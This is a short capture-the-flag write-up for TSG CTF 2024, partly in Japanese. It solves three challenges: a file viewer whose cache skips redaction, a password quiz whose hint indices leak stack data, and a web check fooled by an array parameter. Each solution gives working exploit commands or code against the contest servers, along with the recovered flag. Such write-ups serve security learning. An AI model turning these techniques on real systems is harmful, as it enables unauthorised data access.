TSG CTF 2024 Writeup

# TSG CTF 2024 Writeup ![score.ctf.tsg.ne.jp_teams_214](https://hackmd.io/_uploads/S1nN8rn4kl.png) ## Misc ### Cached File Viewer > I implemented a simple file viewer! > > \> ls ~ 99-bottles-of-bear.txt chal diary.txt flag recipe.txt start.sh ``` if (arena.find(filename) != arena.end()) { items[index].str = arena[filename]; items[index].is_redacted = false; return; } ``` `main.cpp` を読むと `load_file` でキャッシュの内容を読み込んだ場合 `is_redacted` が `false` になっていることがわかります。　`flag` を2回 `load_file` してから `read` すると `flag` の内容が出力されます。 ``` > nc 34.146.186.1 21001 1. load_file 2. read 3. bye choice > 1 index > 0 filename > flag Read 22 bytes. 1. load_file 2. read 3. bye choice > 1 index > 0 filename > flag 1. load_file 2. read 3. bye choice > 2 index > 0 content: TSGCTF{!7esuVVz2n@!Fm} 1. load_file 2. read 3. bye choice > 3 Goodbye! ``` #### Flag `TSGCTF{!7esuVVz2n@!Fm}` ## Pwn ### Password-Ate-Quiz > It seems that if you enter the correct password, they will give you the flag. ```python from pwn import * def solve(): io = remote('34.146.186.1', 41778); io.recvuntil(b'Enter the password > ') io.sendline((chr(0x11) * 31).encode()) password1 = b'' for i in range(4, 8): io.recvuntil(b'Enter a hint number (0~2) > ') io.sendline(str(i).encode()) password1 += io.recvline()[:-1] password2 = b'' for i in range(8, 12): io.recvuntil(b'Enter a hint number (0~2) > ') io.sendline(str(i).encode()) password2 += io.recvline()[:-1] password = b'' for (b1, b2) in zip(password1, password2): c = b1 ^ b2 ^ 0x11 if chr(c).isprintable(): password += c.to_bytes() io.sendline(b'a') io.recvuntil(b'Enter the password > ') io.sendline(password) io.recvline() flag = io.recvline().decode() io.close() return flag if __name__ == '__main__': print(solve()) ``` #### Flag `TSGCTF{S74ck_h45_much_1nf0m4710n_81775684690}` ## Web ### Toolong Tea > Recently it's getting colder in Tokyo which TSG is based in. Would you like to have a cup of hot oolong tea? It will warm up your body. ```js fetch('/', { 'method': 'POST', 'headers': { 'content-type': 'application/json' }, 'body': JSON.stringify({ num: [65536, 1, 1] }) }) ``` #### Flag `TSGCTF{A_holy_night_with_no_dawn_my_dear...}`